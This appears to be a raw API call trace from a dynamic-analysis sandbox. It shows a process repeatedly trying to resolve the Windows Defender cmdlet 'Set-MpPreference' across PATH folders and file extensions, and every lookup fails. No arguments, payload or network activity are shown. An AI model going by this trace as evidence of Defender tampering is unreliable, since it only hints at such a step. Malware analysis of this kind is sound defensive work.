	[0057.868] SetErrorMode (uMode=0x1) returned 0x1
	[0057.869] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.psm1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.869] GetLastError () returned 0x2
	[0057.869] SetErrorMode (uMode=0x1) returned 0x1
	[0057.869] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.869] GetLastError () returned 0x2
	[0057.869] SetErrorMode (uMode=0x1) returned 0x1
	[0057.869] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.psd1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.869] GetLastError () returned 0x2
	[0057.869] SetErrorMode (uMode=0x1) returned 0x1
	[0057.869] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.869] GetLastError () returned 0x2
	[0057.870] SetErrorMode (uMode=0x1) returned 0x1
	[0057.870] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.COM", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.870] GetLastError () returned 0x2
	[0057.870] SetErrorMode (uMode=0x1) returned 0x1
	[0057.870] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.870] GetLastError () returned 0x2
	[0057.870] SetErrorMode (uMode=0x1) returned 0x1
	[0057.870] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.EXE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.870] GetLastError () returned 0x2
	[0057.870] SetErrorMode (uMode=0x1) returned 0x1
	[0057.870] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.870] GetLastError () returned 0x2
	[0057.870] SetErrorMode (uMode=0x1) returned 0x1
	[0057.871] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.BAT", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.871] GetLastError () returned 0x2
	[0057.871] SetErrorMode (uMode=0x1) returned 0x1
	[0057.871] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.871] GetLastError () returned 0x2
	[0057.871] SetErrorMode (uMode=0x1) returned 0x1
	[0057.871] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.CMD", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.871] GetLastError () returned 0x2
	[0057.871] SetErrorMode (uMode=0x1) returned 0x1
	[0057.871] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.871] GetLastError () returned 0x2
	[0057.871] SetErrorMode (uMode=0x1) returned 0x1
	[0057.871] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.VBS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.872] GetLastError () returned 0x2
	[0057.872] SetErrorMode (uMode=0x1) returned 0x1
	[0057.872] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.872] GetLastError () returned 0x2
	[0057.872] SetErrorMode (uMode=0x1) returned 0x1
	[0057.872] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.VBE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.872] GetLastError () returned 0x2
	[0057.872] SetErrorMode (uMode=0x1) returned 0x1
	[0057.872] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.872] GetLastError () returned 0x2
	[0057.872] SetErrorMode (uMode=0x1) returned 0x1
	[0057.872] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.JS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.873] GetLastError () returned 0x2
	[0057.873] SetErrorMode (uMode=0x1) returned 0x1
	[0057.873] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.873] GetLastError () returned 0x2
	[0057.873] SetErrorMode (uMode=0x1) returned 0x1
	[0057.873] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.JSE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.873] GetLastError () returned 0x2
	[0057.873] SetErrorMode (uMode=0x1) returned 0x1
	[0057.873] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.873] GetLastError () returned 0x2
	[0057.873] SetErrorMode (uMode=0x1) returned 0x1
	[0057.873] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.WSF", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.873] GetLastError () returned 0x2
	[0057.874] SetErrorMode (uMode=0x1) returned 0x1
	[0057.874] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.874] GetLastError () returned 0x2
	[0057.874] SetErrorMode (uMode=0x1) returned 0x1
	[0057.874] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.WSH", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.874] GetLastError () returned 0x2
	[0057.874] SetErrorMode (uMode=0x1) returned 0x1
	[0057.874] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.874] GetLastError () returned 0x2
	[0057.874] SetErrorMode (uMode=0x1) returned 0x1
	[0057.874] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference.MSC", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.875] GetLastError () returned 0x2
	[0057.875] SetErrorMode (uMode=0x1) returned 0x1
	[0057.875] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23
	[0057.875] GetLastError () returned 0x2
	[0057.875] SetErrorMode (uMode=0x1) returned 0x1
	[0057.875] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\Set-MpPreference", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.875] GetLastError () returned 0x2
	[0057.875] SetErrorMode (uMode=0x1) returned 0x1
	[0057.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.877] GetLastError () returned 0x2
	[0057.877] SetErrorMode (uMode=0x1) returned 0x1
	[0057.877] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.ps1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.878] GetLastError () returned 0x2
	[0057.878] SetErrorMode (uMode=0x1) returned 0x1
	[0057.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.878] GetLastError () returned 0x2
	[0057.878] SetErrorMode (uMode=0x1) returned 0x1
	[0057.878] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psm1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.878] GetLastError () returned 0x2
	[0057.878] SetErrorMode (uMode=0x1) returned 0x1
	[0057.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.878] GetLastError () returned 0x2
	[0057.878] SetErrorMode (uMode=0x1) returned 0x1
	[0057.878] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psd1", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.879] GetLastError () returned 0x2
	[0057.879] SetErrorMode (uMode=0x1) returned 0x1
	[0057.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.879] GetLastError () returned 0x2
	[0057.879] SetErrorMode (uMode=0x1) returned 0x1
	[0057.879] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.COM", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.879] GetLastError () returned 0x2
	[0057.879] SetErrorMode (uMode=0x1) returned 0x1
	[0057.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.879] GetLastError () returned 0x2
	[0057.879] SetErrorMode (uMode=0x1) returned 0x1
	[0057.879] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.EXE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.879] GetLastError () returned 0x2
	[0057.880] SetErrorMode (uMode=0x1) returned 0x1
	[0057.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.880] GetLastError () returned 0x2
	[0057.880] SetErrorMode (uMode=0x1) returned 0x1
	[0057.880] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.BAT", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.880] GetLastError () returned 0x2
	[0057.880] SetErrorMode (uMode=0x1) returned 0x1
	[0057.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.880] GetLastError () returned 0x2
	[0057.880] SetErrorMode (uMode=0x1) returned 0x1
	[0057.880] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.CMD", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.880] GetLastError () returned 0x2
	[0057.880] SetErrorMode (uMode=0x1) returned 0x1
	[0057.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.880] GetLastError () returned 0x2
	[0057.880] SetErrorMode (uMode=0x1) returned 0x1
	[0057.881] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.881] GetLastError () returned 0x2
	[0057.881] SetErrorMode (uMode=0x1) returned 0x1
	[0057.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.881] GetLastError () returned 0x2
	[0057.881] SetErrorMode (uMode=0x1) returned 0x1
	[0057.881] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.882] GetLastError () returned 0x2
	[0057.882] SetErrorMode (uMode=0x1) returned 0x1
	[0057.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.882] GetLastError () returned 0x2
	[0057.882] SetErrorMode (uMode=0x1) returned 0x1
	[0057.882] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JS", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.882] GetLastError () returned 0x2
	[0057.882] SetErrorMode (uMode=0x1) returned 0x1
	[0057.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.882] GetLastError () returned 0x2
	[0057.882] SetErrorMode (uMode=0x1) returned 0x1
	[0057.882] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JSE", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.882] GetLastError () returned 0x2
	[0057.882] SetErrorMode (uMode=0x1) returned 0x1
	[0057.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.882] GetLastError () returned 0x2
	[0057.883] SetErrorMode (uMode=0x1) returned 0x1
	[0057.883] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSF", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.883] GetLastError () returned 0x2
	[0057.883] SetErrorMode (uMode=0x1) returned 0x1
	[0057.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.883] GetLastError () returned 0x2
	[0057.883] SetErrorMode (uMode=0x1) returned 0x1
	[0057.883] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSH", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.883] GetLastError () returned 0x2
	[0057.883] SetErrorMode (uMode=0x1) returned 0x1
	[0057.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0057.883] GetLastError () returned 0x2
	[0057.883] SetErrorMode (uMode=0x1) returned 0x1
	[0057.883] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.MSC", lpFindFileData=0x401a50 | out: lpFindFileData=0x401a50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0057.884] GetLastError () returned 0x2
	[0057.884] SetErrorMode (uMode=0x1) returned 0x1
	[0057.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x55fe650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
